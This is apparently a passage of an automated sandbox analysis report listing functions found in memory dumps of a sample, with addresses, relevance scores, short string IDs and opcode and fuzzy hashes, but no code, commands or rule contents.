                                                                                                                                                                                                                                                                          Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                          • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                          Function 00B0A637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: e83c2d8228cd7c3e31d317decdbb65ea87a4f0422b4fbeb11317de744b215f75
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF71BF32A083558FD714CE28C88071ABFE2ABC5750F29CDADE4949B3D1D675DD498B83
                                                                                                                                                                                                                                                                          Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                          Function 00B1A9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction ID: ed27ec38481fe18abb5f6d49f0ada3743b54db0131b37dfcca470e70f40376a1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 774129B6E516518FD704DFA4CC455ABBB72FF84315B0AC1A8C8847B316D77869078BD0
                                                                                                                                                                                                                                                                          Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                          Function 00B1CFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                          • Instruction ID: 57c911934f5113b50f2b86aa4a10d67e02802e2476c999b34427e51f289f5469
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63312534304300AFEB209F24DCA5BBBFBE4EB8A714F64457CE58593290D671EC92C656
                                                                                                                                                                                                                                                                          Function 00B1D0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                          • Instruction ID: 635892821dd24938220c08374dc45870cbd9f2a878fc3f3e74dfd052ecd27d2d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731E774304301BBEB109F24DC81BBBBBE5EB86714F64496CE584A7291D771ECA0C656
                                                                                                                                                                                                                                                                          Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
                                                                                                                                                                                                                                                                          • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                                          Function 00B06739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: dB
                                                                                                                                                                                                                                                                          • API String ID: 0-2104629891
                                                                                                                                                                                                                                                                          • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                          • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                                          Function 004143C2 Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
                                                                                                                                                                                                                                                                          • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                                          Function 0043C280 Relevance: .4, Instructions: 422COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                                                                                                                                                                          • Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
                                                                                                                                                                                                                                                                          Function 0043C1F0 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
                                                                                                                                                                                                                                                                          • Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
                                                                                                                                                                                                                                                                          Function 004166A0 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                          • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                                                                                                                                                                          Function 00AE9967 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                          • Instruction ID: e7338cdde584b833458eaa1077d9400485a2c46b1159b4053785f3d72223f4b8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51C105B16083808BD718DF25C8506AFBBE6EFD1314F14492DE4D687392DB75C50ACB56
                                                                                                                                                                                                                                                                          Function 00409700 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                          • Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
                                                                                                                                                                                                                                                                          Function 00AFEC17 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                          • Instruction ID: fddb4a016f10892ade9b082f12ab6f1226a21cff05e62acad339ac0cfb4e7015
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD6154356083949FC725CF68C85092A7BE0AF96320F4882BDF9E48B3A2D675DC05D792
                                                                                                                                                                                                                                                                          Function 0041E9B0 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                          • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                                                                                                                                                                          Function 004369A0 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                                                          • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                                                                                                                                                                          Function 00AF6907 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                                                          • Instruction ID: e88ca382e34a60c9933b6e8b9ef358c4b7d093c96d1959a4dae8dd664f871c9d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18618AB16003068FE728CF65D891252FBA1FF46300F0996ACD1998F752E778E9C1CB85
                                                                                                                                                                                                                                                                          Function 00B1B2CF Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                          • Instruction ID: 4e264acf035ba01adf15f5f3a31ce558908cb84c9c554e6fe91712d489f0e318
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D415776E587148FC328EF64E8C09BAB2E2ABDA314F1E857C89E617354DB704D508289
                                                                                                                                                                                                                                                                          Function 0043B068 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
